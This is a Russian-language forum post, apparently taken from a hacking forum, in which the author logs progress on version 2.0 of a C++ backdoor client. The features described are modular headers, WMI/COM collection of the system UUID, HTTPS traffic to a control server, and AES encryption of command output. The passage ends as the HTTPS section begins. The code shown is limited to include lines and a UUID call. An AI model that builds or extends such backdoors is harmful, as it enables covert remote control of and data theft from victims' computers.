D2
Администратор
- Реакции
- 0
Backdoor 2.0
Автор: OMAR_HAYAT
Источник: https://xss.is
Всем привет!
Пришло время подвести очередные итоги написания клиента на Cpp. Прошлая версия получилась предельно сырой, как носки при гулянии по лужам. В новой версии концентрация H2O снизилась. Тем не менее есть свои скользкие места.
Что удалось реализовать в версии 2.0:
0х01. Попытался навести порядок в коде применив заголовочные файлы;
0х02. Прикрутил работу с COM обьектами;
0х03. Обмен данными с сервером делаем через HTTPS;
0х04. Вывод команды теперь не просто кодируем в base64, а почти полноценно шифруем!
Теперь обо всём попрядку.
0х01. Попытался навести порядок в коде применив заголовочные файлы.
Захотелось разложить все основные куски кода по своим файлам. Так проще проследить логику проги в main`e и в перспективе можно будет подключать такие заголовочники в другие проекты. Пока что мне сложно сказать оптимально или нет я реализовал такую идею. Опыта в этом нет от слова совсем. Поэтому авторитетные оценки приветствуются.
C++: Скопировать в буфер обмена
Код:
#include <string>
#include "base64.h"
#include "wmi_com.h"
#include "send_msg.h"
#include "utils.h"
#include "exec_command.h"
#include "aes_crypto.h"
0х02. Прикрутил работу с COM обьектами.
Из анализа чужого кода и советов бывалых стало понятно что первичный сбор инфы лучше выполнять через различные сервисы и технологии встроенные в винду. Одна из самых частых, если не самая частая, это технология COM (Component Object Model). Я применил её для решения одной частной задачи. Определение UUID системы. Хотя потенциал у неё в вопросах сбора данных о системе значительно шире.
В main`е реализованно всё просто:
Код:
// Собираем первичную информацию о системе;
uuid = wmi_com();
std::wcout << L"UUID: " << uuid << std::endl;
0х03. Обмен данными с сервером делаем через HTTPS.